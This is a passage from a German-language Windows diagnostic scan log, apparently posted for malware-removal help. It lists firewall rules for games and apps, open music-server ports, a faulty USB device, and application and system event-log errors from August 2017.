C:\users\*****\appdata\roaming\dropbox\bin\dropbox.exe FirewallRules: [{F723C80F-371B-4A95-8F54-FA07E9E42973}] => (Allow) G:\Program Files (x86)\Battle.net\Battle.net.exe FirewallRules: [{3059C505-B8D3-418B-AC08-C874D15FA7DE}] => (Allow) G:\Program Files (x86)\Battle.net\Battle.net.exe FirewallRules: [TCP Query User{3C48B5B3-18E3-4B84-A540-634DC83BA8B8}G:\program files (x86)\the elder scrolls online\launcher\bethesda.net_launcher.exe] => (Allow) G:\program files (x86)\the elder scrolls online\launcher\bethesda.net_launcher.exe FirewallRules: [UDP Query User{B8D0287B-F1FE-4955-A6F8-D589CB7A01F5}G:\program files (x86)\the elder scrolls online\launcher\bethesda.net_launcher.exe] => (Allow) G:\program files (x86)\the elder scrolls online\launcher\bethesda.net_launcher.exe FirewallRules: [{DB86E705-4890-40A5-853E-1F2EEC9DD046}] => (Allow) G:\Program Files (x86)\Origin Games\Dragon Age Inquisition\DragonAgeInquisition.exe FirewallRules: [{C497194B-F1B8-4616-B08F-6951EFC5E468}] => (Allow) G:\Program Files (x86)\Origin Games\Dragon Age Inquisition\DragonAgeInquisition.exe FirewallRules: [TCP Query User{410E0639-1031-468E-8C0C-9B488EDB7278}C:\users\*****\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\*****\appdata\local\akamai\netsession_win.exe FirewallRules: [UDP Query User{0A39A2D1-3CAD-4DEE-BFD9-AD76B69202F7}C:\users\*****\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\*****\appdata\local\akamai\netsession_win.exe FirewallRules: [{ABF58F19-4D87-4BE8-A373-55D7E1D64B7A}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe FirewallRules: [{E9500049-D9E9-4E8B-A598-216A386F8B2C}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe FirewallRules: [{6B35CD45-1CCB-44FE-8E73-3326D85DEF6B}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe FirewallRules: [{81BFC3EA-16DF-4E60-B196-7E489C7383B7}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe FirewallRules: [{81D600BE-5020-4F81-BFB0-4BF18DA2B05D}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFSP.exe FirewallRules: [{6E5A5B32-5FA5-4BC2-A041-480153DF1E83}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFSP.exe FirewallRules: [{6347001A-5F4B-4B99-BB7A-524AA41C0AD0}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFSP.exe FirewallRules: [{56D9A896-9B47-43D5-98CA-538A542BD200}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFSP.exe FirewallRules: [{D9FC3B0B-F50C-4BC2-BF3F-CDE2F2C9A290}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFMP.exe FirewallRules: [{5A1C6FA4-8139-4243-B3B8-47B3EFB3EA53}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFMP.exe FirewallRules: [{A213CF29-EB9C-4BFC-A988-0B1F4472789D}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFMP.exe FirewallRules: [{D64B53D7-E8CD-40BD-9C91-72A20AD3970A}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFMP.exe FirewallRules: [{F2578368-AA70-433E-B35A-5009C86D1E17}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe FirewallRules: [{9F5E0788-335F-42C1-A22C-50F7D9CDC79D}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [{32406C39-953C-460B-AFE6-CDE4B232D40D}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [TCP Query User{3EDA9F19-1F96-411E-8C1C-F563E58A3ADE}G:\games\world_of_warplanes\wowplauncher.exe] => (Allow) G:\games\world_of_warplanes\wowplauncher.exe FirewallRules: [UDP Query User{68DEDDE0-6036-412F-AA44-08A74EE184D7}G:\games\world_of_warplanes\wowplauncher.exe] => (Allow) G:\games\world_of_warplanes\wowplauncher.exe FirewallRules: [{AE314296-B5C7-4DF4-9374-D088F3A08615}] => (Block) G:\games\world_of_warplanes\wowplauncher.exe FirewallRules: [{FDD2B1D2-8138-4DF1-B121-ED318FBA427B}] => (Block) G:\games\world_of_warplanes\wowplauncher.exe FirewallRules: [{29D2BACC-43CD-4803-B503-59899E87FD68}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\mordheim\mordheim.exe FirewallRules: [{FECFCD89-9DE5-49A3-B3A4-56AC70E40CD6}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\mordheim\mordheim.exe FirewallRules: [TCP Query User{D8825ED6-64AE-45C5-B113-ECB7858A95CA}G:\program files\cloud imperium games\patcher\cigpatcher.exe] => (Allow) G:\program files\cloud imperium games\patcher\cigpatcher.exe FirewallRules: [UDP Query User{7E395701-8E52-444C-8DA5-90B6FF036164}G:\program files\cloud imperium games\patcher\cigpatcher.exe] => (Allow) G:\program files\cloud imperium games\patcher\cigpatcher.exe FirewallRules: [{413FDA69-6273-4C65-BB74-8CE72A1CF6C4}] => (Block) G:\program files\cloud imperium games\patcher\cigpatcher.exe FirewallRules: [{9ADFBB2B-0B80-4A64-8FCB-571605B6D8A4}] => (Block) G:\program files\cloud imperium games\patcher\cigpatcher.exe FirewallRules: [TCP Query User{A6D22F2F-32BB-4C44-8C74-EBDFE4627990}G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe] => (Allow) G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe FirewallRules: [UDP Query User{E0FE8A20-C7CF-4897-B34B-C86C940403CA}G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe] => (Allow) G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe FirewallRules: [{EBFEFE2F-A517-416E-AB96-B57AFAF058B1}] => (Block) G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe FirewallRules: [{37DDA592-72D9-4843-B53B-828006F78A9A}] => (Block) G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe FirewallRules: [{7E09FB06-AEB8-47CD-B06C-2F012CFD67D8}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Endless Space\EndlessSpace.exe FirewallRules: [{44C7FB35-3400-4EEB-A7E0-CAABCFA9010D}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Endless Space\EndlessSpace.exe FirewallRules: [{2E30090F-BF18-4888-8C31-BDFB251C40AA}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Terraria\Terraria.exe FirewallRules: [{1E06EE93-F65D-4232-8C20-FF047C2960B3}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Terraria\Terraria.exe FirewallRules: [{CB8A9966-C9BA-4D24-8DCF-82CCC446AD7E}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Elite Dangerous Horizons\EDLaunch.exe FirewallRules: [{10D47C8E-1911-4379-B2A7-3DFAF5FECB49}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Elite Dangerous Horizons\EDLaunch.exe FirewallRules: [TCP Query User{AE697FDF-95CB-4742-AFE1-175E002D0CDD}G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe] => (Allow) G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe FirewallRules: [UDP Query User{21CEB7FC-0894-4127-82BF-6C74648C47A4}G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe] => (Allow) G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe FirewallRules: [{922401B8-85D9-4FC4-B488-C575AD393F0E}] => (Allow) G:\Program Files (x86)\Origin Games\STAR WARS Battlefront\starwarsbattlefront.exe FirewallRules: [{A0BED04D-77EC-44B5-A349-7E6248C82D08}] => (Allow) G:\Program Files (x86)\Origin Games\STAR WARS Battlefront\starwarsbattlefront.exe FirewallRules: [TCP Query User{6D865778-4B1C-48E3-8EDE-88B07DE0E8CE}G:\program files (x86)\origin games\star wars battlefront\starwarsbattlefront.exe] => (Allow) G:\program files (x86)\origin games\star wars battlefront\starwarsbattlefront.exe FirewallRules: [UDP Query User{13FFCB9B-2BE1-472F-96CE-29F783837766}G:\program files (x86)\origin games\star wars battlefront\starwarsbattlefront.exe] => (Allow) G:\program files (x86)\origin games\star wars battlefront\starwarsbattlefront.exe FirewallRules: [{CB31CEEC-1545-42AA-9B71-7426B88BFB5E}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Galactic Civilizations III\GalCiv3.exe FirewallRules: [{61419720-4278-4910-BFAC-E93AF187E7DF}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Galactic Civilizations III\GalCiv3.exe FirewallRules: [TCP Query User{9A8EDE9E-029B-47AF-A061-7525FEE74527}G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe FirewallRules: [UDP Query User{9F7A08A0-4DBC-40F2-89AC-5BA6AA0CD90F}G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe FirewallRules: [TCP Query User{B00611DA-10FE-4A45-9987-D344F69AFE59}G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe] => (Allow) G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe FirewallRules: [UDP Query User{3CE54E08-6C8E-4877-B238-A663ACEC403D}G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe] => (Allow) G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe FirewallRules: [TCP Query User{02FD6615-749C-459B-9329-E9D3D840FD87}G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe] => (Allow) G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe FirewallRules: [UDP Query User{0849F913-291A-4888-8D45-66C5704945BD}G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe] => (Allow) G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe FirewallRules: [TCP Query User{6D5C88B3-7D5E-4872-82F0-A3CB31A96B85}C:\users\*****\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\*****\appdata\roaming\spotify\spotify.exe FirewallRules: [UDP Query User{5CB68C43-4C63-438F-98EB-749826872FBE}C:\users\*****\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\*****\appdata\roaming\spotify\spotify.exe FirewallRules: [{75747872-239D-4591-85C3-EC5A1D6EC796}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame_BE.exe FirewallRules: [{A5A856A7-452C-421E-A65C-1EB4C29A172C}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame_BE.exe FirewallRules: [{1508135B-998A-4813-8812-87AD3D57489A}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame.exe FirewallRules: [{DA814E91-168A-465A-9266-00F76B832A69}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame.exe FirewallRules: [{4C6E3958-1227-48B4-A938-C23D7B034480}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\No Man's Sky\Binaries\NMS.exe FirewallRules: [{01193C79-C53E-4CB8-B7C2-5F0F8EC74B25}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\No Man's Sky\Binaries\NMS.exe FirewallRules: [{F72D0DCF-6A2B-4F0C-BBA7-0C8DD6BCC27F}] => (Allow) G:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rayman Origins\gu.exe FirewallRules: [{A93DA08B-800F-4E4E-8BBB-368C93F6080A}] => (Allow) G:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rayman Origins\gu.exe FirewallRules: [{D3231BE9-FB26-4B52-A06F-C76F95C54121}] => (Allow) G:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rayman Origins\Rayman Origins.exe FirewallRules: [{C17DA570-D7C5-4124-A736-398D9CEBB379}] => (Allow) G:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rayman Origins\Rayman Origins.exe FirewallRules: [{F87F2FB5-8593-4BFD-B2A9-A08FA335DB4D}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Master of Orion\MasterOfOrion.exe FirewallRules: [{DD2FEDAC-B152-4BA8-A685-87BB03D81555}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Master of Orion\MasterOfOrion.exe FirewallRules: [{DC75C909-CEA5-498F-B98D-A5FA3673F55B}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Total War WARHAMMER\launcher\launcher.exe FirewallRules: [{67EB36C9-7978-4E8B-B4E2-D789597F76F7}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Total War WARHAMMER\launcher\launcher.exe FirewallRules: [TCP Query User{1B9BBC75-D6A3-451D-9402-7BF428C6B964}G:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) G:\program files (x86)\hearthstone\hearthstone.exe FirewallRules: [UDP Query User{9F8F6E86-D511-4F2C-892D-703134694F63}G:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) G:\program files (x86)\hearthstone\hearthstone.exe FirewallRules: [{8AF18EE4-FBC6-4D0A-BC4E-D3F149CDB2A9}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Tom Clancy's The Division\thedivision.exe FirewallRules: [{87EB15D3-94CF-4471-A526-5B82C235CB03}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Tom Clancy's The Division\thedivision.exe FirewallRules: [{CA69E6B0-A279-4343-AF7A-0AF44A42D8DA}] => (Block) LPort=445 FirewallRules: [{E924BE7C-390D-4029-AF9F-F7E5005B87A0}] => (Block) LPort=445 FirewallRules: [{B3BD5C1D-80FD-4A00-BF14-9B9B1B4C9F15}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Dawn of War III\RelicDoW3.exe FirewallRules: [{38D2290F-C6D2-4166-A44D-3ECDEEA6A2AF}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Dawn of War III\RelicDoW3.exe FirewallRules: [TCP Query User{50D16B60-67AB-488A-AE5C-E61D97824CA9}G:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) G:\program files (x86)\hearthstone\hearthstone.exe FirewallRules: [UDP Query User{19EF7346-06B2-43ED-8F39-A83414013D6C}G:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) G:\program files (x86)\hearthstone\hearthstone.exe FirewallRules: [{6DB5B824-C375-4374-B640-5A46AE0D856B}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe FirewallRules: [{2F010EF3-6120-4A95-B9C0-5CD981CCF542}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe FirewallRules: [{09CB81DB-7550-4F7B-B023-18A4A3920F6B}] => (Allow) C:\Users\*****\AppData\Local\Warframe\Downloaded\Public\Tools\Launcher.exe FirewallRules: [{692B4130-23BF-4C1F-96BC-5039D5E48ED4}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Tools\RemoteCrashSender.exe FirewallRules: [{C0A906DA-FAB3-4A93-97C7-F59B870BDFA1}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe FirewallRules: [{BF2178FB-4544-451B-9B32-D5A4C31F4FCA}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe FirewallRules: [{F37A5F7E-D189-4815-A302-2891EAFA783C}] => (Allow) C:\Users\*****\AppData\Local\Warframe\Downloaded\Public\Tools\Launcher.exe FirewallRules: [{7C735814-90CD-4F3A-A051-211C0BBD9495}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Tools\RemoteCrashSender.exe FirewallRules: [{DAC4BDBD-6873-4C9D-A3D9-1CF7A9DBD691}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\TheLongDark\tld.exe FirewallRules: [{D08800A7-21B0-4FDF-93DC-9BBF11F5F80E}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\TheLongDark\tld.exe FirewallRules: [{607765EA-BFDC-4528-857D-9DB7207FA061}] => (Allow) G:\Program Files (x86)\Origin Games\SimCity\SimCity\SimCity.exe FirewallRules: [{9C65B7A2-4B3D-4E1D-98A3-4C2662F366C7}] => (Allow) G:\Program Files (x86)\Origin Games\SimCity\SimCity\SimCity.exe FirewallRules: [{FEA59EF6-632E-4765-9BA8-17DBA601260E}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Total War WARHAMMER\launcher\launcher.exe FirewallRules: [{5B99B3A8-F2E7-4326-BBDD-FC046CAA57D7}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Total War WARHAMMER\launcher\launcher.exe FirewallRules: [{6AB67BB1-CE72-42C7-B1A7-686993AA20AC}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe FirewallRules: [{AFFDAA2A-A01E-4601-9977-4EC518739200}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe FirewallRules: [{064DE8B2-CDAB-4E65-AA20-4F44B1C38564}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe FirewallRules: [{F30A19A3-5234-4E0D-8B86-B393932138B4}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [{EA33863E-67CD-4843-A527-7077DE793E0E}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [{ED9892D6-6D9D-426F-97C9-38483F4C7806}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe FirewallRules: [{C6E60452-31A4-49DE-8FC4-6093529938F3}] => (Allow) C:\Program Files (x86)\MyDrive Connect\TomTom MyDrive Connect.exe FirewallRules: [{E76100CD-DE19-44E3-957C-3D5E4FCCDCC3}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe DomainProfile\GloballyOpenPorts: [9000:TCP] => Enabled:Logitech Media Server 9000 tcp (UI) DomainProfile\GloballyOpenPorts: [9001:TCP] => Enabled:UE Music Library 9001 tcp (UI) DomainProfile\GloballyOpenPorts: [9002:TCP] => Enabled:UE Music Library 9002 tcp (UI) DomainProfile\GloballyOpenPorts: [9003:TCP] => Enabled:UE Music Library 9003 tcp (UI) DomainProfile\GloballyOpenPorts: [9004:TCP] => Enabled:UE Music Library 9004 tcp (UI) DomainProfile\GloballyOpenPorts: [9005:TCP] => Enabled:UE Music Library 9005 tcp (UI) DomainProfile\GloballyOpenPorts: [9006:TCP] => Enabled:UE Music Library 9006 tcp (UI) DomainProfile\GloballyOpenPorts: [9007:TCP] => Enabled:UE Music Library 9007 tcp (UI) DomainProfile\GloballyOpenPorts: [9008:TCP] => Enabled:UE Music Library 9008 tcp (UI) DomainProfile\GloballyOpenPorts: [9009:TCP] => Enabled:UE Music Library 9009 tcp (UI) DomainProfile\GloballyOpenPorts: [9010:TCP] => Enabled:UE Music Library 9010 tcp (UI) DomainProfile\GloballyOpenPorts: [9100:TCP] => Enabled:UE Music Library 9100 tcp (UI) DomainProfile\GloballyOpenPorts: [8000:TCP] => Enabled:UE Music Library 8000 tcp (UI) DomainProfile\GloballyOpenPorts: [10000:TCP] => Enabled:UE Music Library 10000 tcp (UI) DomainProfile\GloballyOpenPorts: [9090:TCP] => Enabled:UE Music Library 9090 tcp (UI) DomainProfile\GloballyOpenPorts: [3483:UDP] => Enabled:UE Music Library 3483 udp DomainProfile\GloballyOpenPorts: [3483:TCP] => Enabled:UE Music Library 3483 tcp DomainProfile\GloballyOpenPorts: [3546:TCP] => 3483:TCP:*:Enabled:UE Music Library 3483 tcp DomainProfile\GloballyOpenPorts: [3546:UDP] => 3483:UDP:*:Enabled:UE Music Library 3483 udp StandardProfile\GloballyOpenPorts: [9000:TCP] => Enabled:Logitech Media Server 9000 tcp (UI) StandardProfile\GloballyOpenPorts: [9001:TCP] => Enabled:UE Music Library 9001 tcp (UI) StandardProfile\GloballyOpenPorts: [9002:TCP] => Enabled:UE Music Library 9002 tcp (UI) StandardProfile\GloballyOpenPorts: [9003:TCP] => Enabled:UE Music Library 9003 tcp (UI) StandardProfile\GloballyOpenPorts: [9004:TCP] => Enabled:UE Music Library 9004 tcp (UI) StandardProfile\GloballyOpenPorts: [9005:TCP] => Enabled:UE Music Library 9005 tcp (UI) StandardProfile\GloballyOpenPorts: [9006:TCP] => Enabled:UE Music Library 9006 tcp (UI) StandardProfile\GloballyOpenPorts: [9007:TCP] => Enabled:UE Music Library 9007 tcp (UI) StandardProfile\GloballyOpenPorts: [9008:TCP] => Enabled:UE Music Library 9008 tcp (UI) StandardProfile\GloballyOpenPorts: [9009:TCP] => Enabled:UE Music Library 9009 tcp (UI) StandardProfile\GloballyOpenPorts: [9010:TCP] => Enabled:UE Music Library 9010 tcp (UI) StandardProfile\GloballyOpenPorts: [9100:TCP] => Enabled:UE Music Library 9100 tcp (UI) StandardProfile\GloballyOpenPorts: [8000:TCP] => Enabled:UE Music Library 8000 tcp (UI) StandardProfile\GloballyOpenPorts: [10000:TCP] => Enabled:UE Music Library 10000 tcp (UI) StandardProfile\GloballyOpenPorts: [9090:TCP] => Enabled:UE Music Library 9090 tcp (UI) StandardProfile\GloballyOpenPorts: [3483:UDP] => Enabled:UE Music Library 3483 udp StandardProfile\GloballyOpenPorts: [3483:TCP] => Enabled:UE Music Library 3483 tcp StandardProfile\GloballyOpenPorts: [3546:TCP] => 3483:TCP:*:Enabled:UE Music Library 3483 tcp StandardProfile\GloballyOpenPorts: [3546:UDP] => 3483:UDP:*:Enabled:UE Music Library 3483 udp ==================== Wiederherstellungspunkte ========================= 09-08-2017 18:56:47 JRT Pre-Junkware Removal ==================== Fehlerhafte Geräte im Gerätemanager ============= Name: Unbekanntes USB-Gerät (Fehler beim Anfordern einer Gerätebeschreibung.) Description: Unbekanntes USB-Gerät (Fehler beim Anfordern einer Gerätebeschreibung.) Class Guid: {36fc9e60-c465-11cf-8056-444553540000} Manufacturer: (Standard-USB-Hostcontroller) Service: Problem: : Windows has stopped this device because it has reported problems. (Code 43) Resolution: One of the drivers controlling the device notified the operating system that the device failed in some manner. For more information about how to diagnose the problem, see the hardware documentation. ==================== Fehlereinträge in der Ereignisanzeige: ========================= Applikationsfehler: ================== Error: (08/09/2017 06:57:01 PM) (Source: ESENT) (EventID: 455) (User: ) Description: SettingSyncHost (8636) {7275B360-D16E-4A63-999E-C1E83CAE2702}: Fehler -1811 (0xfffff8ed) beim Öffnen von Protokolldatei C:\Users\*****\AppData\Local\Microsoft\Windows\SettingSync\remotemetastore\v1\edb0001C.log. Error: (08/09/2017 06:55:36 PM) (Source: Windows Search Service) (EventID: 1019) (User: ) Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">. Error: (08/09/2017 06:55:06 PM) (Source: Windows Search Service) (EventID: 1019) (User: ) Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">. Error: (08/09/2017 06:33:11 PM) (Source: Windows Search Service) (EventID: 3079) (User: ) Description: Benachrichtigungen für Volume C:\ sind nicht aktiv. Kontext: Windows Anwendung Details: Falscher Parameter. (HRESULT : 0x80070057) (0x80070057) Error: (08/08/2017 11:12:20 PM) (Source: Windows Search Service) (EventID: 1019) (User: ) Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">. Error: (08/08/2017 11:09:20 PM) (Source: Windows Search Service) (EventID: 1019) (User: ) Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">. Error: (08/08/2017 07:54:42 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Name der fehlerhaften Anwendung: svchost.exe_AppReadiness, Version: 10.0.15063.0, Zeitstempel: 0x02799ef5 Name des fehlerhaften Moduls: ntdll.dll, Version: 10.0.15063.447, Zeitstempel: 0xa329d3a8 Ausnahmecode: 0xc0000374 Fehleroffset: 0x00000000000f775f ID des fehlerhaften Prozesses: 0x14c0 Startzeit der fehlerhaften Anwendung: 0x01d3106f677803f8 Pfad der fehlerhaften Anwendung: c:\windows\system32\svchost.exe Pfad des fehlerhaften Moduls: C:\WINDOWS\SYSTEM32\ntdll.dll Berichtskennung: e32cdd45-cc09-4755-a884-1766a58cffdb Vollständiger Name des fehlerhaften Pakets: Anwendungs-ID, die relativ zum fehlerhaften Paket ist: Error: (08/08/2017 07:28:21 PM) (Source: Perflib) (EventID: 1008) (User: ) Description: Die Open-Prozedur für den Dienst "BITS" in der DLL "C:\Windows\System32\bitsperf.dll" war nicht erfolgreich. Die Leistungsdaten für diesen Dienst sind nicht verfügbar. Die ersten vier Bytes (DWORD) des Datenbereichs enthalten den Fehlercode. Error: (08/08/2017 06:00:39 PM) (Source: ESENT) (EventID: 455) (User: ) Description: SettingSyncHost (7672) {6A2B0A61-8ED9-4BCE-AD27-3A8AE10CACC4}: Fehler -1811 (0xfffff8ed) beim Öffnen von Protokolldatei C:\Users\*****\AppData\Local\Microsoft\Windows\SettingSync\metastore\edb00025.log. Error: (08/08/2017 05:58:23 PM) (Source: Windows Search Service) (EventID: 1019) (User: ) Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">. Systemfehler: ============= Error: (08/09/2017 06:56:58 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Dienst "NVIDIA NetworkService Container" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert. Error: (08/09/2017 06:56:58 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Der Dienst "NVIDIA LocalSystem Container" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 6000 Millisekunden durchgeführt: Neustart des Diensts. Error: (08/09/2017 06:56:56 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Der Dienst "NVIDIA Display Container LS" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 1000 Millisekunden durchgeführt: Neustart des Diensts. Error: (08/09/2017 06:42:41 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Der Dienst "Digital Wave Update Service" wurde aufgrund folgenden Fehlers nicht gestartet: Das System kann die angegebene Datei nicht finden. Error: (08/09/2017 06:40:25 PM) (Source: BugCheck) (EventID: 1001) (User: ) Description: Der Computer wurde nach einem schwerwiegenden Fehler neu gestartet. Der Fehlercode war: 0x00000050 (0xffff8900bc3a2000, 0x0000000000000002, 0xfffff80318b0a846, 0x0000000000000000). Ein volles Abbild wurde gespeichert in: C:\WINDOWS\MEMORY.DMP. Berichts-ID: 7499a157-048c-4741-ae6b-42281a81fc43. Error: (08/09/2017 06:40:24 PM) (Source: NETLOGON) (EventID: 3095) (User: ) Description: Dieser Computer ist als Mitglied einer Arbeitsgruppe konfiguriert, nicht als Mitglied einer Domäne. Der Anmeldedienst braucht bei dieser Konfiguration nicht gestartet zu sein. Error: (08/09/2017 06:40:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Der Dienst "CldFlt" wurde aufgrund folgenden Fehlers nicht gestartet: Die Anforderung wird nicht unterstützt. Error: (08/09/2017 06:40:23 PM) (Source: EventLog) (EventID: 6008) (User: ) Description: Das System wurde zuvor am 08.08.2017 um 23:15:03 unerwartet heruntergefahren. Error: (08/08/2017 11:15:06 PM) (Source: DCOM) (EventID: 10010) (User: SILENTDRAGON) Description: Der Server "{D7FD466D-F6CF-4C8E-86DD-12E9B0FDAE48}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden. Error: (08/08/2017 11:15:06 PM) (Source: DCOM) (EventID: 10010) (User: SILENTDRAGON) Description: Der Server "{D7FD466D-F6CF-4C8E-86DD-12E9B0FDAE48}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden. CodeIntegrity: =================================== Date: 2017-07-28 18:15:03.249 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements. Date: 2017-07-28 18:15:02.562 Description: Code Integrity determined that a process 